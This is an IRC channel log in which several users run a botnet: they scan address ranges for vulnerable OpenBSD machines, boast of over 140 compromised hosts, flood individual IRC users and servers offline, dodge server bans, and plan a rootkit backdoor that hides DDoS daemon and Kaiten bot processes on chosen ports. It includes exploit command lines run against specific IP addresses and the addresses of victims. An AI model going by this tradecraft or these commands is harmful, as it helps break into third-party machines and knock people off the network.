synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :heheh
Joar!~toxica@grendel.csc.smith.edu :holy jesus
MTrez!mtrez@theprojext.com :hello Joar
Joar!~toxica@grendel.csc.smith.edu :Hi MTrez
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :hahah
Joar!~toxica@grendel.csc.smith.edu :I see the net is growing =)
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :when i first saw this my heart nearly exploded
MTrez!mtrez@theprojext.com :ehhe of course
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :insane
Joar!~toxica@grendel.csc.smith.edu :my god.. Irc-mafia should phear this enormous killer net
Joar!~toxica@grendel.csc.smith.edu :=)
MTrez!mtrez@theprojext.com :;p
MTrez!mtrez@theprojext.com :i will get many many more
MTrez!mtrez@theprojext.com :ive only scanned about 5 a classes
Joar!~toxica@grendel.csc.smith.edu ::)
Joar!~toxica@grendel.csc.smith.edu :hehe
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :hahahha
MTrez!mtrez@theprojext.com :im just waiting for the rootkit
MTrez!mtrez@theprojext.com :so i dont have to go back
MTrez!mtrez@theprojext.com :and install over all the boxes
MTrez!mtrez@theprojext.com :just gonna do these then start installing rootkit from the begining
MTrez!mtrez@theprojext.com :ont he rest
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :ok bbl gonna go watch tv
MTrez!mtrez@theprojext.com :cya
Joar!~toxica@grendel.csc.smith.edu :what rootkit are you waiting for?
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :ronn|e keep working u lazy baitch ;P
MTrez!mtrez@theprojext.com :my friends openbsd rootkit
Ronn|e!ronnie@lostforever.org :*gobble* !
Ronn|e!ronnie@lostforever.org :*gobble* !
Joar!~toxica@grendel.csc.smith.edu :k
MTrez!mtrez@theprojext.com :woot
Ronn|e!ronnie@lostforever.org :lol
MTrez!mtrez@theprojext.com :ronnie is doing all the hard ones tho
MTrez!mtrez@theprojext.com :haha
MTrez!mtrez@theprojext.com :i just get the shitty insta-roots
MTrez!mtrez@theprojext.com :;p
MTrez!mtrez@theprojext.com :i dont understand that buffer shit
MTrez!mtrez@theprojext.com :lol
Joar!~toxica@grendel.csc.smith.edu :MTrez: is it okay if I invite a friend inside for a little visit? he is coo
MTrez!mtrez@theprojext.com :ehhe, i spose
MTrez!mtrez@theprojext.com :as long as he wont kill the bots
MTrez!mtrez@theprojext.com :or expect to ddos from em ;p
Joar!~toxica@grendel.csc.smith.edu :hehe
Joar!~toxica@grendel.csc.smith.edu ::)
MTrez!mtrez@theprojext.com :ello
Crow-awy!crow@who-is.0nline.no :hey Joar;)
Ronn|e!ronnie@lostforever.org :*GOBBLE* !
Joar!~toxica@grendel.csc.smith.edu :hi, Mtrez made the net :p
MTrez!mtrez@theprojext.com :ehhe
MTrez!mtrez@theprojext.com :cool
Crow-awy!crow@who-is.0nline.no :;)
MTrez!mtrez@theprojext.com :mtrez + ronnie
MTrez!mtrez@theprojext.com :;)
Joar!~toxica@grendel.csc.smith.edu :aight :) + ronnie
Joar!~toxica@grendel.csc.smith.edu :hehe
MTrez!mtrez@theprojext.com :heheh
MTrez!mtrez@theprojext.com :rofl
Ronn|e!ronnie@lostforever.org :LOLOLOL
MTrez!mtrez@theprojext.com :fuckin hell
MTrez!mtrez@theprojext.com :who told?!?
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :told yea don;t tell any1
MTrez!mtrez@theprojext.com :fuckin
MTrez!mtrez@theprojext.com :all on irc.rt.ru..:eXo-47!root@213.80.36.30 QUIT :Connection closed
MTrez!mtrez@theprojext.com :time toddos irc.rt.ru
MTrez!mtrez@theprojext.com :hahaha
MTrez!mtrez@theprojext.com :quick
MTrez!mtrez@theprojext.com :someone help me change all the bots nick
Joar!~toxica@grendel.csc.smith.edu :hehe
MTrez!mtrez@theprojext.com :shit
MTrez!mtrez@theprojext.com :more at the bottom
MTrez!mtrez@theprojext.com :i didnt notice
MTrez!mtrez@theprojext.com :rofl
MTrez!mtrez@theprojext.com :ehhe
MTrez!mtrez@theprojext.com :exo-92 is stubborn
MTrez!mtrez@theprojext.com :its okay
MTrez!mtrez@theprojext.com :leave it
MTrez!mtrez@theprojext.com :we can lose 1
MTrez!mtrez@theprojext.com :lol
MTrez!mtrez@theprojext.com :fucking ircops
MTrez!mtrez@theprojext.com :bastards
Joar!~toxica@grendel.csc.smith.edu :hehe
MTrez!mtrez@theprojext.com :.ACTION hopes the irc.rt.ru op doesnt notify other ops.
MTrez!mtrez@theprojext.com :heheh
MTrez!mtrez@theprojext.com :at least it was only a temp kline
MTrez!mtrez@theprojext.com :hehe
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :sod that server lol
Ronn|e!ronnie@lostforever.org :hrm
Ronn|e!ronnie@lostforever.org :whatever was the command
MTrez!mtrez@theprojext.com :not bad
MTrez!mtrez@theprojext.com :ehheh
MTrez!mtrez@theprojext.com :most came back
Joar!~toxica@grendel.csc.smith.edu ::)
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :ok got to run again gf is finally home
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :l8r
MTrez!mtrez@theprojext.com :cya
Joar!~toxica@grendel.csc.smith.edu :I think the root ident got the ircops attention
Joar!~toxica@grendel.csc.smith.edu :and the nicks
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :NO more fuckups or i kill ya
MTrez!mtrez@theprojext.com :yah, likely
Joar!~toxica@grendel.csc.smith.edu :mm
synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :;P
MTrez!mtrez@theprojext.com :bastards were probably watching who connected to their servers
MTrez!mtrez@theprojext.com :whores
MTrez!mtrez@theprojext.com :hehehe
Joar!~toxica@grendel.csc.smith.edu :hehe
MTrez!mtrez@theprojext.com :gah
MZOVMZA!root@167.206.137.189 JOIN :#exo..:
MTrez!mtrez@theprojext.com :fucking assholes
Joar!~toxica@grendel.csc.smith.edu :ooo
MTrez!mtrez@theprojext.com :all from irc.rt.ru
MTrez!mtrez@theprojext.com :wtf is their problem
MTrez!mtrez@theprojext.com :heh
Joar!~toxica@grendel.csc.smith.edu :you should take that server away from the .c file
MTrez!mtrez@theprojext.com :sonofa
MTrez!mtrez@theprojext.com :heh
MTrez!mtrez@theprojext.com :ehhehe
Ronn|e!ronnie@lostforever.org :seems was not enough
Ronn|e!ronnie@lostforever.org :hehe
MTrez!mtrez@theprojext.com :yeh ;p
MTrez!mtrez@theprojext.com :doesnt reply to pings for me anymore
Ronn|e!ronnie@lostforever.org :dead now
MTrez!mtrez@theprojext.com :yay heheh
Joar!~toxica@grendel.csc.smith.edu :irc.rt.ru??
Ronn|e!ronnie@lostforever.org :no haha
MTrez!mtrez@theprojext.com :nah, some cable guy i think
MTrez!mtrez@theprojext.com :heheh
Joar!~toxica@grendel.csc.smith.edu :hehhe, ok
Ronn|e!ronnie@lostforever.org :djinsanity
Joar!~toxica@grendel.csc.smith.edu :hehe
SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :umm..:
BQXKFSXW!~GDKB@adsl-66-126-60-242.dsl.sktn01.pacbell.net JOIN :#exo
SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :irc.webgiro.se
SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :just banned me
Joar!~toxica@grendel.csc.smith.edu :serious?
Joar!~toxica@grendel.csc.smith.edu :for beeing in here?
SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :yes
SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :i think so
Joar!~toxica@grendel.csc.smith.edu :hmm, maybe we should change channel
MTrez!mtrez@theprojext.com :hrm
MTrez!mtrez@theprojext.com :what was the ban msg synth?
Joar!~toxica@grendel.csc.smith.edu :fucks sakes, yea, I was also banned last night by webgiro!
SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :You are banned from this server- drones (2002/08/08 01.52)
SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :-
SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :Closing Link:
synthBBL[sinix@12.30.169.219] (Connection closed)..:
SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :-
MTrez!mtrez@theprojext.com :hah
MTrez!mtrez@theprojext.com :you were joar?
SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :some1 is spreading the bans
Joar!~toxica@grendel.csc.smith.edu :Ye
MTrez!mtrez@theprojext.com :how come u didnt mention anything?
Joar!~toxica@grendel.csc.smith.edu :a
Joar!~toxica@grendel.csc.smith.edu :I was on webgiro for like 3 weeks, then yestoday night I got banned
MTrez!mtrez@theprojext.com :hrm
MTrez!mtrez@theprojext.com :alright
MTrez!mtrez@theprojext.com :well
SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :i have been on it for months
MTrez!mtrez@theprojext.com :for now just everyone part
Joar!~toxica@grendel.csc.smith.edu :I never saw the message, Im on bnc
MTrez!mtrez@theprojext.com :come in if your on a host you dont mind getting klined
Ronn|e!ronnie@lostforever.org :ya
MTrez!mtrez@theprojext.com :heh
MTrez!mtrez@theprojext.com :im out
Ronn|e!ronnie@lostforever.org :ill get a prxy
hfue IRC MODE #exo +o rezzie
rezzie!loud@65.116.89.149 :heh
rezzie!loud@65.116.89.149 :sup
rezzie!loud@65.116.89.149 ::)
ronnie!~Stargazer@152.94.16.11 :heya
ronnie!~Stargazer@152.94.16.11 :hehe
rezzie!loud@65.116.89.149 :i banned kim
rezzie!loud@65.116.89.149 :just in case they try to ban him
rezzie!loud@65.116.89.149 :ehhe
ronnie!~Stargazer@152.94.16.11 :ya
rezzie!loud@65.116.89.149 :its amazing how many bots are on irc.rt.ru
rezzie!loud@65.116.89.149 :i didnt know
rezzie!loud@65.116.89.149 :heheh
rezzie!loud@65.116.89.149 :they havent dented it
rezzie!loud@65.116.89.149 :;p
ronnie!~Stargazer@152.94.16.11 :<irc.rt.ru.OP> /topic #e
rezzie!loud@65.116.89.149 :?
ronnie!~Stargazer@152.94.16.11 :lol
ronnie!~Stargazer@152.94.16.11 :j/k
rezzie!loud@65.116.89.149 :oh hehe
rezzie!loud@65.116.89.149 :i think the bans are over
rezzie!loud@65.116.89.149 :finally
rezzie!loud@65.116.89.149 :hehe
ronnie!~Stargazer@152.94.16.11 :*GOBBLE* !
rezzie!loud@65.116.89.149 :hehe
rezzie!loud@65.116.89.149 :yay
ronnie!~Stargazer@152.94.16.11 :*GOBBLE!*
rezzie!loud@65.116.89.149 :cool
rezzie!loud@65.116.89.149 :;)
exobad
Joar!~toxica@grendel.csc.smith.edu :im clean,
Joar!~toxica@grendel.csc.smith.edu ::)
rezzie!loud@65.116.89.149 :;)
Joar!~toxica@grendel.csc.smith.edu :bots still getting killed?
rezzie!loud@65.116.89.149 :nah
rezzie!loud@65.116.89.149 :theyre are none left on irc.rt.ru
Joar!~toxica@grendel.csc.smith.edu :k,
rezzie!loud@65.116.89.149 :heheh
Joar!~toxica@grendel.csc.smith.edu ::D
rezzie!loud@65.116.89.149 :there we go
rezzie!loud@65.116.89.149 :heh
Joar!~toxica@grendel.csc.smith.edu :hehe
Joar!~toxica@grendel.csc.smith.edu :nice
rezzie!loud@65.116.89.149 :rejoin Joar
rezzie!loud@65.116.89.149 :lol
rezzie!loud@65.116.89.149 :;)
Joar!~toxica@grendel.csc.smith.edu :hehe
Joar!~toxica@grendel.csc.smith.edu :is there any random nick command, such ass warnicks, if
something like that should happen again?
ronnie!~Stargazer@152.94.16.11 :don't think so
Joar!~toxica@grendel.csc.smith.edu :k,
ronnie!~Stargazer@152.94.16.11 :would be cool all of them rotate randomly, such as, each two hours
ronnie!~Stargazer@152.94.16.11 :maybe scripted can do it, random chars, and msg everybody in the
channel with !NICK NICK NEWNICK command
ronnie!~Stargazer@152.94.16.11 :or whatever
Joar!~toxica@grendel.csc.smith.edu :yea
Joar!~toxica@grendel.csc.smith.edu :it would rock
Joar!~toxica@grendel.csc.smith.edu :more secure
ronnie!~Stargazer@152.94.16.11 :ya
ronnie!~Stargazer@152.94.16.11 :also, if notice : *Drones* *temp* *line*
ronnie!~Stargazer@152.94.16.11 :issue the war nick change commands
ronnie!~Stargazer@152.94.16.11 :automatically
Joar!~toxica@grendel.csc.smith.edu :yea
Joar!~toxica@grendel.csc.smith.edu :=)
ronnie!~Stargazer@152.94.16.11 :but well that's just an idea, making it is a different thing hehe,
i don't know shit about tcl
ronnie!~Stargazer@152.94.16.11 :though shouldn't be difficult
Joar!~toxica@grendel.csc.smith.edu :I think I should learn tcl, lots of cool stuff that could be done :D
ronnie!~Stargazer@152.94.16.11 :look similar to C to me somehow
ronnie!~Stargazer@152.94.16.11 :like a mix between c and perl
ronnie!~Stargazer@152.94.16.11 :i only know c and asm, and on windows
Joar!~toxica@grendel.csc.smith.edu :mm
Joar!~toxica@grendel.csc.smith.edu :I prog some java only
ronnie!~Stargazer@152.94.16.11 :i see, java is similar to c
ronnie!~Stargazer@152.94.16.11 :i see, java is similar to c
Joar!~toxica@grendel.csc.smith.edu :I`ve been trying t learn some perl, though I got ubstructed by
school and shit
Joar!~toxica@grendel.csc.smith.edu :yea
ronnie!~Stargazer@152.94.16.11 :you mostly know 50% of the basis of it then
Joar!~toxica@grendel.csc.smith.edu :not many hackers search for vulns in java, thats why most BAnks
use java as software :)
Joar!~toxica@grendel.csc.smith.edu :mm
ronnie!~Stargazer@152.94.16.11 :hehe
Joar!~toxica@grendel.csc.smith.edu :its true =)
Joar!~toxica@grendel.csc.smith.edu :see for yourself =)
ronnie!~Stargazer@152.94.16.11 :i like C a lot, though i don't know shit about c++ or
ronnie!~Stargazer@152.94.16.11 :objects, classes, etc
Joar!~toxica@grendel.csc.smith.edu :mm
Joar!~toxica@grendel.csc.smith.edu :its a bit confusing at first, but after a while the peaces fall together =)
ronnie!~Stargazer@152.94.16.11 :rezzie, im gonna change the tool in c that kills duplicates
ronnie!~Stargazer@152.94.16.11 :gonna make it kill the items that are not open ssh
ronnie!~Stargazer@152.94.16.11 :and versions that don't work
rezzie!loud@65.116.89.149 :ill do that random stuff in a few moments
ronnie!~Stargazer@152.94.16.11 :rezzie
ronnie!~Stargazer@152.94.16.11 :check this out
ronnie!~Stargazer@152.94.16.11 :one tic
rezzie!loud@65.116.89.149 :im thinking about this nick switch thing
rezzie!loud@65.116.89.149 :trying to figure out how to do it with the least ammount of spam
rezzie!loud@65.116.89.149 :heheh
ronnie!~Stargazer@152.94.16.11 :what kind of connection is bdsl btw ?
rezzie!loud@65.116.89.149 :no clue
rezzie!loud@65.116.89.149 :ehhe
no1here!~no1here@152.94.16.11 :oh no its me
no1here!~no1here@152.94.16.11 :hehehe
no1here!~no1here@152.94.16.11 :intruder muHAHHAHA
no1here!~no1here@152.94.16.11 :i rewted scripted
rezzie!loud@65.116.89.149 :;p
rezzie!loud@65.116.89.149 :whos u?
no1here!~no1here@152.94.16.11 :i no wike u
rezzie!loud@65.116.89.149 :oh synth
rezzie!loud@65.116.89.149 :heh
no1here!~no1here@152.94.16.11 :i am rons little biatch
ronnie!~Stargazer@152.94.16.11 :lol
rezzie!loud@65.116.89.149 :like our little tripwire
rezzie!loud@65.116.89.149 :?
rezzie!loud@65.116.89.149 :lol
no1here!~no1here@152.94.16.11 :yea ahahha
rezzie!loud@65.116.89.149 :intruder alert!
rezzie!loud@65.116.89.149 :hehe
ronnie!~Stargazer@152.94.16.11 :anal intruder !
rezzie!loud@65.116.89.149 :i should make it ban the person if they dont get opped in 5 seconds
rezzie!loud@65.116.89.149 :;p
ronnie!~Stargazer@152.94.16.11 :rezzie, seen the stuff about the motorbikes ?
rezzie!loud@65.116.89.149 :no what?
no1here!~no1here@152.94.16.11 :please for the love of all that is fruityrewty stop the klines
ronnie!~Stargazer@152.94.16.11 :http://www.b3ta.com/motorbikes/
no1here!~no1here@152.94.16.11 :rezzie u have to see the motorbikes
no1here!~no1here@152.94.16.11 :haha i am gonna use that in a email now
no1here!~no1here@152.94.16.11 :ROFL
no1here!~no1here@152.94.16.11 :to gf's brother
ronnie!~Stargazer@152.94.16.11 :he leads a bikers gang ?
no1here!~no1here@152.94.16.11 :no he has a couple of bikes
rezzie!loud@65.116.89.149 :blah
no1here!~no1here@152.94.16.11 :heh nice
rezzie!loud@65.116.89.149 :yah, if it worked ;p
rezzie!loud@65.116.89.149 :i messed something up
no1here!~no1here@152.94.16.11 :h
no1here!~no1here@152.94.16.11 :a
no1here!~no1here@152.94.16.11 :o o t t a h c y m g n i t p y n e m a I
rezzie!loud@65.116.89.149 :hahaha
no1here!~no1here@152.94.16.11 :haha stewpid bawt
rezzie!loud@65.116.89.149 :shuttup
rezzie!loud@65.116.89.149 :;p
no1here!~no1here@152.94.16.11 :AHAHHAH
rezzie!loud@65.116.89.149 :oh my god
rezzie!loud@65.116.89.149 :heh
ezzie!loud@65.116.89.149 :i dont think it will stop
ol8huTaut!~no1here@152.94.16.11 :christ
ronnie!~Stargazer@152.94.16.11 :rezzie, i think those bots worked via msg too
ol8huTaut!~no1here@152.94.16.11 :make it stop
ronnie!~Stargazer@152.94.16.11 :might be better to just msg them the command
rezzie!loud@65.116.89.149 :nah
rezzie!loud@65.116.89.149 :kaiten doesnt accept msg
rezzie!loud@65.116.89.149 :heh
ronnie!~Stargazer@152.94.16.11 :or scripted will get flooed out
ronnie!~Stargazer@152.94.16.11 :i see
no1here!~no1here@152.94.16.11 :wtf was that btw
no1here!~no1here@152.94.16.11 :nice
rezzie!loud@65.116.89.149 :nvm
rezzie!loud@65.116.89.149 :just testing something
rezzie!loud@65.116.89.149 :shh u
rezzie!loud@65.116.89.149 :heh
rezzie!loud@65.116.89.149 :nicks cant begin with a number
no1here!~no1here@152.94.16.11 :<@rezzie> nvm ni
rezzie!loud@65.116.89.149 :so i need to filter out random strings with a number starting them
rezzie!loud@65.116.89.149 :sec
rezzie!loud@65.116.89.149 :still uses number nicks
rezzie!loud@65.116.89.149 :god damn it
no1here!~no1here@152.94.16.11 :ahha
no1here!~no1here@152.94.16.11 :christ
rezzie!loud@65.116.89.149 :o i c why
no1here!~no1here@152.94.16.11 :k bbl
rezzie!loud@65.116.89.149 :cya
no1here!~no1here@152.94.16.11 :gf is home again
no1here!~no1here@152.94.16.11 :ehhe
ronnie!~Stargazer@152.94.16.11 :give her cock !
no1here!~no1here@152.94.16.11 :na tommorow
no1here!~no1here@152.94.16.11 :she is too tired
no1here!~no1here@152.94.16.11 :she worked double shifts
ronnie!~Stargazer@152.94.16.11 :ic
no1here!~no1here@152.94.16.11 :i will be back soon to annoy u 2 ;)
ronnie!~Stargazer@152.94.16.11 :i don't want your cock !
ronnie!~Stargazer@152.94.16.11 :lol
rezzie!loud@65.116.89.149 :heh, nice one
ronnie!~Stargazer@152.94.16.11 :ya, i fucked it up
ronnie!~Stargazer@152.94.16.11 :lol
ronnie!~Stargazer@152.94.16.11 :check priv msg mate
ronnie!~Stargazer@152.94.16.11 :fucking hell
ronnie!~Stargazer@152.94.16.11 :<O_6> h
r0nn13!~Stargazer@152.94.16.11 :god, back now lol
rezzie!loud@65.116.89.149 :hehe
rezzie!loud@65.116.89.149 :bb in a bit
r0nn13!~Stargazer@152.94.16.11 :what are you doing
r0nn13!~Stargazer@152.94.16.11 :lol
r0nn13!~Stargazer@152.94.16.11 :207.174.228
no1here!~no1here@152.94.16.11 :AHHAH
no1here!~no1here@152.94.16.11 :doh
no1here!~no1here@152.94.16.11 :jesus
no1here!~no1here@152.94.16.11 :what an idiot
r0nn13!~Stargazer@152.94.16.11 :i did that the same
r0nn13!~Stargazer@152.94.16.11 :some mins ago
r0nn13!~Stargazer@152.94.16.11 :try 207.174.228.252
r0nn13!~Stargazer@152.94.16.11 :that's the right person
r0nn13!~Stargazer@152.94.16.11 :lol
no1here!~no1here@152.94.16.11 :i was doing your dirty work lol
no1here!~no1here@152.94.16.11 :hahaha jebus
r0nn13!~Stargazer@152.94.16.11 :haha
no1here!~no1here@152.94.16.11 :kinda a good idea though
no1here!~no1here@152.94.16.11 :packs just pile up on top of each other
r0nn13!~Stargazer@152.94.16.11 :enough
r0nn13!~Stargazer@152.94.16.11 :lol..:
r0nn13!~Stargazer@152.94.16.11 :its dead
no1here!~no1here@152.94.16.11 :doesn;t seem to be
r0nn13!~Stargazer@152.94.16.11 :Ping statistics for 24.51.87.99:
r0nn13!~Stargazer@152.94.16.11 : Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
no1here!~no1here@152.94.16.11 :oh how do u do that?
r0nn13!~Stargazer@152.94.16.11 :oh on dos
no1here!~no1here@152.94.16.11 :hrmm
no1here!~no1here@152.94.16.11 :should remember not to !* killall with that too
r0nn13!~Stargazer@152.94.16.11 :right
no1here!~no1here@152.94.16.11 :kill each letter separtly too
r0nn13!~Stargazer@152.94.16.11 :ya
no1here!~no1here@152.94.16.11 :<--idio
no1here!~no1here@152.94.16.11 :hrmm nick won;t die though
r0nn13!~Stargazer@152.94.16.11 :prolly the ircd has a long ping time
r0nn13!~Stargazer@152.94.16.11 :or is he talking ?
no1here!~no1here@152.94.16.11 :lightning.net
no1here!~no1here@152.94.16.11 :no talking
no1here!~no1here@152.94.16.11 :just idle atm
r0nn13!~Stargazer@152.94.16.11 :no doubt
r0nn13!~Stargazer@152.94.16.11 :hahahahha
no1here!~no1here@152.94.16.11 :god damn it bing out
no1here!~no1here@152.94.16.11 :jebus i am gonna have to sod it again christ
wEwLtKMZm!~KREFS@h75n3fls21o1067.telia.com NICK :feJm42ns6..:no1here!~no1here@152.94.16.11 :it won't die
no1here!~no1here@152.94.16.11 :hahah
no1here!~no1here@152.94.16.11 :u pulling out all the skillz?
no1here!~no1here@152.94.16.11 :fuck i think he is only cable but it won;t die
no1here!~no1here@152.94.16.11 :those ops are gonna msg u again ROFL
r0nn13!~Stargazer@152.94.16.11 :give it a bit now
no1here!~no1here@152.94.16.11 :sir can we help u?
r0nn13!~Stargazer@152.94.16.11 :nah
r0nn13!~Stargazer@152.94.16.11 :lol
no1here!~no1here@152.94.16.11 :u are being msg flooded?
no1here!~no1here@152.94.16.11 :who is doing this to u?
r0nn13!~Stargazer@152.94.16.11 :hahahahhahaaha
r0nn13!~Stargazer@152.94.16.11 :he pinged out ?
no1here!~no1here@152.94.16.11 :yea
no1here!~no1here@152.94.16.11 :*** sATAN|K (baal@ny-amherst2a-355.buf.adelphia.net) Quit
(Read error: 54 (Connection reset by peer))
no1here!~no1here@152.94.16.11 :ehheh
no1here!~no1here@152.94.16.11 :what letters did u use?
r0nn13!~Stargazer@152.94.16.11 :dunno random ones
no1here!~no1here@152.94.16.11 :HAHAH
no1here!~no1here@152.94.16.11 :hit up button and put kill all command instead
r0nn13!~Stargazer@152.94.16.11 :it ended already
no1here!~no1here@152.94.16.11 :.ACTION starts to snicker.
r0nn13!~Stargazer@152.94.16.11 :its ok
no1here!~no1here@152.94.16.11 :k
no1here!~no1here@152.94.16.11 :took alot eh
SUZZFUZZ NICK dg34gerfg
no1here!~no1here@152.94.16.11 :omg
no1here!~no1here@152.94.16.11 :edu!!!!!!!!!!!!!!!!
no1here!~no1here@152.94.16.11 :edu_OWNZ!!!
r0nn13!~Stargazer@152.94.16.11 :hehe
r0nn13!~Stargazer@152.94.16.11 :nite
no1here!~no1here@152.94.16.11 :nite ron
no1here!~no1here@152.94.16.11 :heheh that guy still has not returned online
no1here!~no1here@152.94.16.11 :HEHEHEH
no1here!~no1here@152.94.16.11 :face it u cannot stop
no1here!~no1here@152.94.16.11 :oh u bad bad man
rezzie!loud@65.116.89.149 :;)
no1here!~no1here@152.94.16.11 :well i am off to bed
no1here!~no1here@152.94.16.11 :nitez
JHPSHB!~RFGHJFJ@most.wanted.terrori.st :lol.
JHPSHB!~RFGHJFJ@most.wanted.terrori.st :nice
JHPSHB!~RFGHJFJ@most.wanted.terrori.st :nice
JHPSHB!~RFGHJFJ@most.wanted.terrori.st :=)
r0nn13!~Stargazer@152.94.16.11 :morning
r0nn13!~Stargazer@152.94.16.11 :lo, JHPSHB
r0nn13!~Stargazer@152.94.16.11 :damn, fucking rt.ru klining again
r0nn13!~Stargazer@152.94.16.11 :fucking assholes
r0nn13!~Stargazer@152.94.16.11 :they need a hobby
scripted!~scripted@207.104.94.181 :.4INTRUDER!. ->> .scripted. (.~scripted@207.104.94.181.)
scripted!~scripted@207.104.94.181 :.4INTRUDER!. ->> .Joar. (.~toxica@grendel.csc.smith.edu.)
r0nn13!~Stargazer@152.94.16.11 :it stopped replying commands to me
JHPSHB!~RFGHJFJ@most.wanted.terrori.st :same here
r0nn13!~Stargazer@152.94.16.11 :okay cool
r0nn13!~Stargazer@152.94.16.11 :*GOBBLE!*
r0nn13!~Stargazer@152.94.16.11 :rezzie ?
r0nn13!~Stargazer@152.94.16.11 :./ssh -l root 66.25.212.204 -M bsdauth -S skey -j 256 -d 1550
r0nn13!~Stargazer@152.94.16.11 :yay !
r0nn13!~Stargazer@152.94.16.11 :*GOBBLE!*
r0nn13!~Stargazer@152.94.16.11 :./ssh -l root 66.27.81.186 -M bsdauth -S skey -j 4096 -d 3050
r0nn13!~Stargazer@152.94.16.11 :*GOBBLE!*
r0nn13!~Stargazer@152.94.16.11 :*GOBBLE!*
r0nn13!~Stargazer@152.94.16.11 :./ssh -l root 66.57.64.19 -M bsdauth -S skey -j 4096 -d 3050
nn13!~Stargazer@152.94.16.11 :hi rezzie
rezzie!loud@63.145.151.251 :hey
r0nn13!~Stargazer@152.94.16.11 :a shitload got klined
r0nn13!~Stargazer@152.94.16.11 :+
r0nn13!~Stargazer@152.94.16.11 :i did a few new ones
rezzie!loud@63.145.151.251 :yah, i noticed they klined my bot as well
rezzie!loud@63.145.151.251 :heh
rezzie!loud@63.145.151.251 :this is begining to piss me off
scripted0!rezzie@207.104.94.181 :.4INTRUDER!. ->> .scripted0. (.rezzie@207.104.94.181.)
rezzie!loud@63.145.151.251 :heh
scripted0!rezzie@207.104.94.181 :There are 76 alive hosts out of 140 total hosts. %54 capacity.
no1here!~no1here@152.94.16.11 :heh
no1here!~no1here@152.94.16.11 :still adding more?
rezzie!loud@63.145.151.251 :ehhe yah
rezzie!loud@63.145.151.251 :194.* got scanned
rezzie!loud@63.145.151.251 :at least half way anyway
no1here!~no1here@152.94.16.11 :how many u up to?
rezzie!loud@63.145.151.251 :i think the scanner crashed
rezzie!loud@63.145.151.251 :at 194.150ish
rezzie!loud@63.145.151.251 :141 roots aint bad considering theres still ones with no bots on them
rezzie!loud@63.145.151.251 :so theres more
no1here!~no1here@152.94.16.11 :so scanner pulled a rez hrmp
no1here!~no1here@152.94.16.11 :oh
rezzie!loud@63.145.151.251 :152 in my list
no1here!~no1here@152.94.16.11 :jesus
no1here!~no1here@152.94.16.11 :is that the bash kiing one?
no1here!~no1here@152.94.16.11 :the rr
rezzie!loud@63.145.151.251 :ehhhe
rezzie!loud@63.145.151.251 :nah
rezzie!loud@63.145.151.251 :theres a ton of rr ones ithink
rezzie!loud@63.145.151.251 :sc-66-75-96-192.socal.rr.com
rezzie!loud@63.145.151.251 :actually that may be it
rezzie!loud@63.145.151.251 :ehhe
rezzie!loud@63.145.151.251 :clone mania from that one
rezzie!loud@63.145.151.251 :hahh
rezzie!loud@63.145.151.251 :ATTACK OF THE CLONES!
r0nn13!~Stargazer@152.94.16.11 :i killed another
r0nn13!~Stargazer@152.94.16.11 :or what i did
r0nn13!~Stargazer@152.94.16.11 :lol
rezzie!loud@63.145.151.251 :lol
no1here!~no1here@152.94.16.11 :hehhe christ
rezzie!loud@63.145.151.251 :you know
rezzie!loud@63.145.151.251 :before we take these bots off efnet
rezzie!loud@63.145.151.251 :its our duty
rezzie!loud@63.145.151.251 :to mmsg every ircop
rezzie!loud@63.145.151.251 :on irc.rt.ru
no1here!~no1here@152.94.16.11 :HAHHAH
rezzie!loud@63.145.151.251 :more clones
rezzie!loud@63.145.151.251 :;p
no1here!~no1here@152.94.16.11 :jesus
no1here!~no1here@152.94.16.11 :op
no1here!~no1here@152.94.16.11 :some1 caught u
rezzie!loud@63.145.151.251 :alright
rezzie!loud@63.145.151.251 :friend is gonna set me up the rootkit
rezzie!loud@63.145.151.251 :just got in contact with him
rezzie!loud@63.145.151.251 :but since its like the only rootkit that exists for openbsd
rezzie!loud@63.145.151.251 :its not that great
rezzie!loud@63.145.151.251 :hehe
no1here!~no1here@152.94.16.11 :rootkit is what?
rezzie!loud@63.145.151.251 :the procs it hides are hardcoded
no1here!~no1here@152.94.16.11 :patcher?
rezzie!loud@63.145.151.251 :rootkit = patches the root exploit, and gives us a backdoor for life
rezzie!loud@63.145.151.251 :so nobody else can hax the box
no1here!~no1here@152.94.16.11 :HAHAHAH
rezzie!loud@63.145.151.251 :now
rezzie!loud@63.145.151.251 :as for the procs i want hidden
rezzie!loud@63.145.151.251 :im not using these
rezzie!loud@63.145.151.251 :but i assume this will be enough
rezzie!loud@63.145.151.251 :td,tc,tcc,kash,bt1,bt1,kmsc
rezzie!loud@63.145.151.251 :td for the tribe demon, tc for tribe client, tcc
for tribe client spawns, kash for kaiten (if we want, bt1 for bot one if we
install egg, bt2 for bot2 if we install a 2nd, and kmsc for whatever
rezzie!loud@63.145.151.251 :actually ill change kash and kmsc to something a little more obscure
rezzie!loud@63.145.151.251 :alsoi need to decide what ports/ips should be hidden
no1here!~no1here@152.94.16.11 :make it some really odd ports that stuff runs on
no1here!~no1here@152.94.16.11 :so nothing conflicts
rezzie!loud@63.145.151.251 :16837, 24183, 38932, 48389, 51837, 61069, 63994, 54827, 43787, 34992, 29313, 12998
rezzie!loud@63.145.151.251 :ehhe
rezzie!loud@63.145.151.251 :as for ips
rezzie!loud@63.145.151.251 :well
rezzie!loud@63.145.151.251 :not sure what to do there
